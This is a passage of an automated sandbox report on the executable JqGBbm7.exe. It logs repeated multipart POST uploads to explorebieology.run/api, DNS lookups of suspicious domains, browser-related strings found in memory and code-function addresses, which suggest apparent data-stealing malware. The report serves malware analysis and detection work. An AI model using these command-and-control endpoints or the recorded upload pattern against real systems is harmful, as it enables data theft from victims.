    Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8775
    Host: explorebieology.run
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=ASPGXNLNWEAE
    Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20410
    Host: explorebieology.run
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=6Q3E6TYJE8RBGJQCSH
    Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 2515
    Host: explorebieology.run
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=2KZFCL2DX9GXP
    Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 584934
    Host: explorebieology.run
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 89
    Host: explorebieology.run
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: gadgethgfub.icu
Source: global traffic | DNS traffic detected: DNS query: explorebieology.run
Source: global traffic | DNS traffic detected: DNS query: tse1.mm.bing.net
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: explorebieology.run
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Wed, 05 Mar 2025 08:14:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GwZOFV9zTQ3%2BQTpnKiSI9XoZ65G2LSO67joJ0Xo2LPZjHOohStq4VSc8LYXqimAawSYGXi4Ia5Fd28aSZO3MYz2z5cyj%2BWXjqUbHskFeaL7rRx6LJkT07XiLJdrbXkngcROJzUDX"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 91b8287d39783ee0-EWR
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: JqGBbm7.exe, 00000000.00000003.1711329535.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1770654107.0000000000E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/
                Source: JqGBbm7.exe, 00000000.00000003.1796904576.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1781059457.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1806321416.0000000000E46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/F9?~
                Source: JqGBbm7.exe, 00000000.00000003.1711329535.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1781059457.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1770654107.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1770654107.0000000000E44000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1700000000.0000000000DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/api
                Source: JqGBbm7.exe, 00000000.00000003.1796904576.0000000000E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/api.
                Source: JqGBbm7.exe, 00000000.00000003.1740924328.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1741545733.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1755652162.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1741244052.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1755833347.00000000056F0000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1754789182.00000000056E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/api8aHE
                Source: JqGBbm7.exe, 00000000.00000003.1711208127.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711329535.0000000000DFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/apiE
                Source: JqGBbm7.exe, 00000000.00000002.1808013073.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1806416714.0000000000DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/apis
                Source: JqGBbm7.exe, 00000000.00000003.1806321416.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000002.1808063789.0000000000E46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/bu
                Source: JqGBbm7.exe, 00000000.00000003.1806321416.0000000000E46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/bu9
                Source: JqGBbm7.exe, 00000000.00000003.1796904576.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1781059457.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1806321416.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711208127.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711329535.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1770654107.0000000000E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/pi
                Source: JqGBbm7.exe, 00000000.00000003.1806321416.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000002.1808063789.0000000000E46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/t
                Source: JqGBbm7.exe, 00000000.00000003.1740988621.00000000056E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run:443/api
                Source: JqGBbm7.exe, 00000000.00000003.1759597062.0000000000E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run:443/apiexplorebieology.run
                Source: JqGBbm7.exe, 00000000.00000003.1781059457.0000000000E65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run:443/apila
                Source: JqGBbm7.exe, 00000000.00000003.1711853404.000000000573E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: JqGBbm7.exe, 00000000.00000003.1711899590.0000000005737000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711853404.000000000573E000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712069801.0000000005737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: JqGBbm7.exe, 00000000.00000003.1712069801.0000000005712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: JqGBbm7.exe, 00000000.00000003.1711899590.0000000005737000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711853404.000000000573E000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712069801.0000000005737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: JqGBbm7.exe, 00000000.00000003.1712069801.0000000005712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: JqGBbm7.exe, 00000000.00000003.1699572175.0000000000E31000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1699679879.0000000000DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: JqGBbm7.exe, 00000000.00000003.1699572175.0000000000E31000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1699679879.0000000000DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49740 version: TLS 1.2

                System Summary

                Source: JqGBbm7.exeStatic PE information: section name:
                Source: JqGBbm7.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A0A0300_2_00A0A030
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009D607C0_2_009D607C
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A061700_2_00A06170
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009DC3750_2_009DC375
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A064000_2_00A06400
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A0C5DA0_2_00A0C5DA
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A0E5500_2_00A0E550
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A0F0C00_2_00A0F0C0
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009D31830_2_009D3183
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009DB1000_2_009DB100
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009F12E00_2_009F12E0
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009CF3F00_2_009CF3F0
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009CB9900_2_009CB990
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009F7B250_2_009F7B25
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009EDD700_2_009EDD70
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009D1D600_2_009D1D60
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009DBFAA0_2_009DBFAA
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AD00A90_2_00AD00A9
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AAC0AD0_2_00AAC0AD
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AD208B0_2_00AD208B
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AFC0870_2_00AFC087
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A6E0940_2_00A6E094
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AC80940_2_00AC8094
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A8C0E70_2_00A8C0E7
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A620FA0_2_00A620FA
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AD60C60_2_00AD60C6
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009E40E00_2_009E40E0
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00ADA02E0_2_00ADA02E
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A8A0200_2_00A8A020
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A080320_2_00A08032
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00ABE0360_2_00ABE036
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A640610_2_00A64061
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A360770_2_00A36077
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A320780_2_00A32078
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A5004A0_2_00A5004A
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A940580_2_00A94058
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AB01AC0_2_00AB01AC
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AE61A90_2_00AE61A9
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009F81B40_2_009F81B4
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A601970_2_00A60197
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00ACC19B0_2_00ACC19B
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009CC1A00_2_009CC1A0
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A701230_2_00A70123
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A3A12B0_2_00A3A12B
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A5613C0_2_00A5613C
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A7E1600_2_00A7E160
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AD41610_2_00AD4161
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A5214D0_2_00A5214D
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00ACE2BA0_2_00ACE2BA
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00ABA2B30_2_00ABA2B3
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009EA2B00_2_009EA2B0
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AC229E0_2_00AC229E
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A342E10_2_00A342E1
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A9C2F80_2_00A9C2F8
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00ABC2D70_2_00ABC2D7
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A922D70_2_00A922D7
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AF422E0_2_00AF422E
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A442320_2_00A44232
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A5820A0_2_00A5820A
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009D222B0_2_009D222B
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009CA2200_2_009CA220
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AD82110_2_00AD8211
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00B8626A0_2_00B8626A
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A422780_2_00A42278
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00ACA3A30_2_00ACA3A3
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A5A3930_2_00A5A393
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A883920_2_00A88392
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A803970_2_00A80397
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AC63930_2_00AC6393
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AA03FC0_2_00AA03FC
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00ADA3F40_2_00ADA3F4
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AB43F00_2_00AB43F0
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009E43F00_2_009E43F0
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009FA3E00_2_009FA3E0
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A5C3330_2_00A5C333
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A5433B0_2_00A5433B
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00B0031A0_2_00B0031A
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A663080_2_00A66308
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AB63640_2_00AB6364
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A463750_2_00A46375
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00ADC34F0_2_00ADC34F
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A7A3540_2_00A7A354
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A544850_2_00A54485
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A7848E0_2_00A7848E
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A7448A0_2_00A7448A
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009FE4A90_2_009FE4A9
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009CC4D00_2_009CC4D0
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A524F40_2_00A524F4
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A364FF0_2_00A364FF
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A704FA0_2_00A704FA
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_009DE4C20_2_009DE4C2
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A564C50_2_00A564C5
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A604D60_2_00A604D6
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A8C4DF0_2_00A8C4DF
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A944D00_2_00A944D0
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00ADC4D00_2_00ADC4D0
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A864220_2_00A86422
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A8E4240_2_00A8E424
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A9E43B0_2_00A9E43B
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AA44390_2_00AA4439
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AE44390_2_00AE4439
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AF64370_2_00AF6437
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AEC40D0_2_00AEC40D
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00B9041D0_2_00B9041D
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AF44060_2_00AF4406
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A7E41A0_2_00A7E41A
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AC446C0_2_00AC446C
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AA84620_2_00AA8462
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AF04660_2_00AF0466
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A4C4710_2_00A4C471
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00A384790_2_00A38479
                Source: C:\Users\user\Desktop\JqGBbm7.exeCode function: 0_2_00AD04760_2_00AD0476
